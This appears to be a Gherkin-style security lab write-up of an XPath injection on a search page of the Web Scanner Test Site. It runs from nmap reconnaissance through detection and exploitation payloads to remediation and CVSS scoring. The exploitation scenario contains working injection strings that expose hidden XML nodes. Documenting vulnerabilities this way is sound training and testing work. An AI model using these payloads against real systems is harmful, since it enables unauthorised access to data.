## Version 1.4.1
## language: en
Feature:
  TOE:
    Web Scanner Test Site
  Category:
    XPath Injection
  Location:
    http://webscantest.com/xmldb/search_by_name.php - index (field)
  CWE:
    CWE-643: Improper Neutralization of Data within XPath Expressions
    ('XPath Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Obtain unaccesible data using XPath Injection
  Recommendation:
    Properly escape user input before use
    Implement a positive or negative filtering
    Avoid concatenation for XPath query construction

  Background:
  Hacker's software:
    | Name          | Version       |
    | Ubuntu        | 16.04         |
    | Firefox       | 72.0.02       |
    | nmap          | 7.01          |
  TOE information:
    Given I am accesing the webpage
    """
    http://webscantest.com/xmldb/search_by_name.php
    """
    When I get site IP address using command "nslookup webscantest.com"
    """
    Server:     127.0.1.1
    Address:    127.0.1.1#53

    Non-authoritative answer:
    Name:    webscantest.com
    Address: 69.164.223.208
    """
    Then I can see the IP Address information
    When I run "nmap -sC -sV -oA nmap 69.164.223.208"
    Then I can see the webpage information
    And is runing on Ubuntu 14.04.2 LTS
    And is running Apache/2.4.7 (Ubuntu)
    And is powered by PHP/5.5.9

  Scenario: Normal use case
  Page to submit product reviews
    Given I access http://webscantest.com/xmldb/search_by_name.php
    Then I can see a summary of a product to add to a cart
    When I click "Add to Cart"
    Then the page displays message "element added to you cart."

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given the URL from the normal use case scenario
    When I change the "index" parameter to:
    """
    ?index=Lunch'
    """
    Then I get the response "Invalid Query"
    When I try with:
    """
    ?index=Lunch' and '1'='1
    """
    Then I get the same content from the Normal Use Case Scenario
    And I conclude basic XPath logic injections are working

  Scenario: Exploitation
    Given the URL from the normal use case scenario
    When I start changing the "index" parameter in the URL to
    """
    ?index=Lunch%27]/parent::*%00
    """
    Then I can see the parent node "- -"
    When I set the "index" parameter as:
    """
    ?index=Lunch%27]/parent::*/child::node()%00
    """
    Then I can see a list of products that i shouldn't see
    And their XML parents [evidence](1.png)
    And I conclude webpage is vulnerable to some XPath injections

  Scenario: Remediation
    Given The webpage does not filter some XPath syntax characters
    When I sanitize the user-supplied Data
    And Implement a filter to special character as "[],'%/"
    And Avoid concatenation for XPath query construction
    Then The Injection should be patched

  Scenario: Scoring
  Severity scoring according to CVSSv3.1 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.4/10 (Medium) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlation
    No correlations have been found to this date 2020-05-06
